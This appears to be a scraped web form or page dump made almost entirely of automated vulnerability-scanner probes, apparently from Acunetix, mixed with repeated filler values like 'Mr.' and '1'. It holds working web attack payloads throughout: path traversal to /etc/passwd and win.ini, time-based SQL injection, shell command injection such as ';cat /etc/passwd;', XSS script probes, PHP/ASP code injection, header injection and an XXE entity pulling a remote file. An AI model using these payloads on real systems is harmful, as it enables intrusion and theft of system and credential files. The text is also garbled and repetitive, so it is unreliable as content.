\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

../../../../../../../../../../etc/passwd.

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

/../..//../..//../..//../..//../..//etc/passwd.

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

/etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

................etc/passwd

1

invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1

file:///etc/passwd

1

/\../\../\../\../\../\../\../etc/passwd

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.

1

windowswin.ini

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1'"()&%prompt(982075)

Mr.

1;931766

Mr.'"()&%

1

Mr.;910920

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

response.write(9018421*9960108)

Mr.

'+response.write(9018421*9960108)+'

Mr.

"+response.write(9018421*9960108)+"

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

response.write(9950264*9977676)

1

'+response.write(9950264*9977676)+'

1

"+response.write(9950264*9977676)+"

1

Mr.

${99644+100489}

${100052+100433}

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

Mr.

'"()

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

)

Mr.

1

Mr.

!(()&&!|*|*|

Mr.

1

Mr.

^(#$!@#$)(()))******

1

Mr.

1

Mr.

1

'"()

1

Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Mr.

1

Mr.

1some_inexistent_file_with_long_name%00.jpg

Mr.

1

Mr.

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Mr.

1

Mr.

testasp.vulnweb.com

Mr.

1

Mr.

1

Mr.

1

)

1

!(()&&!|*|*|

1

^(#$!@#$)(()))******

1

Mr.

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.

1

1some_inexistent_file_with_long_name%00.

1

http://testasp.vulnweb.com/t/fit.txt?%00.

1

testasp.vulnweb.com

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/fit.txt

http://testasp.vulnweb.com/t/fit.txt

1

Mr.

1

Mr.

1

Mr.

Mr.

268435455

Mr.

h

Mr.

..

Mr.

1e309

Mr.

'"\'\");|]*{ <>''

Mr.

Mr.

1

Mr.

;print(md5(acunetix_wvs_security_test));

Mr.

';print(md5(acunetix_wvs_security_test));$a='

Mr.

";print(md5(acunetix_wvs_security_test));$a="

Mr.

${@print(md5(acunetix_wvs_security_test))}

Mr.

${@print(md5(acunetix_wvs_security_test))}\

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

1

268435455

1

h

1

;print(md5(acunetix_wvs_security_test));

1

..

1

';print(md5(acunetix_wvs_security_test));$a='

1

1e309

1

";print(md5(acunetix_wvs_security_test));$a="

1

${@print(md5(acunetix_wvs_security_test))}

1

'"\'\");|]*{ <>''

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

Mr.

1

Mr.

acunetix_wvs_invalid_filename

Mr.

frises_creer.php

Mr.

frises_creer.php

Mr.

frises_creer.php/.

Mr.

1

Mr.

1

acunetix_wvs_invalid_filename

1

frises_creer.php

1

frises_creer.php

1

Mr.

1

frises_creer.php/.

1

Mr.

1

Mr.

1

Mr.

1 and sleep(4)

Mr.

1 and sleep(0)

Mr.

1 and sleep(2)

Mr.

1 or (sleep(4)+1) limit 1 --

Mr.

1' and sleep(4)='

Mr.

1' and (sleep(4)+1) limit 1 --

Mr.

1" and sleep(4)="

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

1' or (sleep(4)+1) limit 1 --

Mr.

1" or (sleep(4)+1) limit 1 --

Mr.

1'=sleep(4)='

Mr.

1"=sleep(4)="

Mr.

1'+(select 1 from (select sleep(4))A)+'

Mr.

1;select pg_sleep(4); --

Mr.

1';select pg_sleep(4); --

Mr.

1; waitfor delay '0:0:4' --

Mr.

1'; waitfor delay '0:0:4' --

Mr.

1"; waitfor delay '0:0:4' --

Mr.

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://www.acunetix.tst

Mr.

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

Mr.

1

Mr.

1

http://www.acunetix.tst

1

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

1

Mr.

1

Mr.

'"

Mr.

<!--

Mr.

&cat /etc/passwd&

'"

1

Mr.

'&cat /etc/passwd&'

<!--

1

Mr.

"&cat /etc/passwd&"

Mr.

cat /etc/passwd

Mr.

`cat /etc/passwd`

Mr.

|cat /etc/passwd#

Mr.

'|'ld

Mr.

"|"ld

Mr.

;cat /etc/passwd;

Mr.

';cat /etc/passwd;'

Mr.

";cat /etc/passwd;"

Mr.

||cat /etc/passwd

Mr.

&dir

Mr.

'&dir&'

Mr.

"&dir&"

Mr.

|dir

Mr.

'|dir

Mr.

"|dir

Mr.

1'"()&%<ScRiPt >prompt(972370)</ScRiPt>

Mr.

1_948813

Mr.

1

Mr.

1

Mr.' and sleep(4)='

1

Mr.' and (sleep(4)+1) limit 1 --

1

Mr." and sleep(4)="

1

Mr.' or (sleep(4)+1) limit 1 --

1

Mr." or (sleep(4)+1) limit 1 --

1

Mr.'=sleep(4)='

1

Mr."=sleep(4)="

1

Mr.'+(select 1 from (select sleep(4))A)+'

1

Mr. and sleep(4)

1

Mr. or (sleep(4)+1) limit 1 --

1

Mr.';select pg_sleep(4); --

1

Mr.'; waitfor delay '0:0:4' --

1

Mr."; waitfor delay '0:0:4' --

1

Mr.'"()&%<ScRiPt >prompt(958121)</ScRiPt>

1

Mr._962643

1

Mr._962643

1

Mr._962643

1

Mr._962643

1

Mr.

1

Mr.

1'"

Mr.

\

Mr.

1xa7

Mr.

@@8kUfU

Mr.

JyI=

Mr.

JyI=

Mr.

'"

Mr.

''""

&cat /etc/passwd&

1

'&cat /etc/passwd&'

1

"&cat /etc/passwd&"

1

cat /etc/passwd

1

`cat /etc/passwd`

1

|cat /etc/passwd#

1

'|'ld

1

"|"ld

1

;cat /etc/passwd;

1

';cat /etc/passwd;'

1

";cat /etc/passwd;"

1

||cat /etc/passwd

1

&dir

1

'&dir&'

1

"&dir&"

1

Mr.

1

|dir

1

1'"

1

'|dir

1

\

1

"|dir

1

1xa7

1

@@Aik5k

1

JyI=

1

'"

1

''""

1

Mr.

../../../../../../../../../../etc/passwd

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

../../../../../../../../../../etc/passwd.jpg

Mr.

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

/../..//../..//../..//../..//../..//etc/passwd.jpg

Mr.

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Mr.

/etc/passwd

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

Mr.

................etc/passwd

Mr.

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

Mr.

file:///etc/passwd

Mr.

/\../\../\../\../\../\../\../etc/passwd

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

Mr.

../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../boot.ini

Mr.

../../../../../../../../../../windows/win.ini.jpg

Mr.

windowswin.ini

Mr.

................windowswin.ini

Mr.

..\..\..\..\..\..\..\..\windows\win.ini

Mr.

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Mr.

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

../../../../../../../../../../etc/passwd.

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

/../..//../..//../..//../..//../..//etc/passwd.

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

/etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

................etc/passwd

1

invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1

file:///etc/passwd

1

/\../\../\../\../\../\../\../etc/passwd

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.

1

windowswin.ini

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1'"()&%prompt(916667)

Mr.

1;904534

Mr.'"()&%

1

Mr.;975885

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

response.write(9979168*9121914)

Mr.

'+response.write(9979168*9121914)+'

Mr.

1

Mr.

'+response.write(9979168*9121914)+'

Mr.

"+response.write(9979168*9121914)+"

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

${100010+100007}

response.write(9530529*9651022)

1

Mr.

1

'+response.write(9530529*9651022)+'

1

"+response.write(9530529*9651022)+"

1

${100143+99273}

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

Mr.

'"()

Mr.

)

Mr.

!(()&&!|*|*|

1

Mr.

^(#$!@#$)(()))******

'"()

1

Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Mr.

1some_inexistent_file_with_long_name%00.jpg

Mr.

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Mr.

testasp.vulnweb.com

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

)

1

Mr.

1

!(()&&!|*|*|

1

Mr.

1

^(#$!@#$)(()))******

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.

1

1some_inexistent_file_with_long_name%00.

1

http://testasp.vulnweb.com/t/fit.txt?%00.

1

testasp.vulnweb.com

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/fit.txt

http://testasp.vulnweb.com/t/fit.txt

1

Mr.

1

Mr.

1

Mr.

Mr.

268435455

Mr.

h

Mr.

..

Mr.

1e309

Mr.

'"\'\");|]*{ <>''

Mr.

Mr.

1

Mr.

;print(md5(acunetix_wvs_security_test));

Mr.

';print(md5(acunetix_wvs_security_test));$a='

Mr.

";print(md5(acunetix_wvs_security_test));$a="

Mr.

${@print(md5(acunetix_wvs_security_test))}

Mr.

${@print(md5(acunetix_wvs_security_test))}\

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

;print(md5(acunetix_wvs_security_test));

1

';print(md5(acunetix_wvs_security_test));$a='

1

Mr.

1

Mr.

1

";print(md5(acunetix_wvs_security_test));$a="

1

1

${@print(md5(acunetix_wvs_security_test))}

1

${@print(md5(acunetix_wvs_security_test))}\

1

268435455

1

h

1

..

1

1e309

1

'"\'\");|]*{ <>''

1

1

Mr.

1

Mr.

acunetix_wvs_invalid_filename

Mr.

frises_creer.php

Mr.

frises_creer.php

Mr.

frises_creer.php/.

Mr.

1

Mr.

1

acunetix_wvs_invalid_filename

1

frises_creer.php

1

frises_creer.php

1

frises_creer.php/.

1

Mr.

1

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

1

Mr.

1

Mr.

1

Mr.

1 and sleep(4)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

Mr.

1 or (sleep(4)+1) limit 1 --

Mr.

1' and sleep(4)='

Mr.

1' and (sleep(4)+1) limit 1 --

Mr.

1" and sleep(4)="

Mr.

1' or (sleep(4)+1) limit 1 --

Mr.

1" or (sleep(4)+1) limit 1 --

Mr.

1'=sleep(4)='

Mr.

1"=sleep(4)="

Mr.

1'+(select 1 from (select sleep(4))A)+'

Mr.

1;select pg_sleep(4); --

Mr.

1';select pg_sleep(4); --

Mr.

1; waitfor delay '0:0:4' --

Mr.

1'; waitfor delay '0:0:4' --

Mr.

1"; waitfor delay '0:0:4' --

Mr.

1

Mr.

1

Mr.

1

Mr.

http://www.acunetix.tst

Mr.

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

Mr.

1

http://www.acunetix.tst

1

Mr.

1

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

1

Mr.

1

Mr.

'"

Mr.

<!--

'"

1

<!--

1

Mr.

&cat /etc/passwd&

Mr.

'&cat /etc/passwd&'

Mr.

"&cat /etc/passwd&"

Mr.

cat /etc/passwd

Mr.

`cat /etc/passwd`

Mr.

|cat /etc/passwd#

Mr.

'|'ld

Mr.

"|"ld

Mr.

;cat /etc/passwd;

Mr.

';cat /etc/passwd;'

Mr.

";cat /etc/passwd;"

Mr.

||cat /etc/passwd

Mr.

1'"()&%<ScRiPt >prompt(979564)</ScRiPt>

Mr.

&dir

Mr.

1_917284

Mr.

'&dir&'

Mr.

"&dir&"

Mr.

|dir

Mr.

'|dir

Mr.

"|dir

Mr.

1

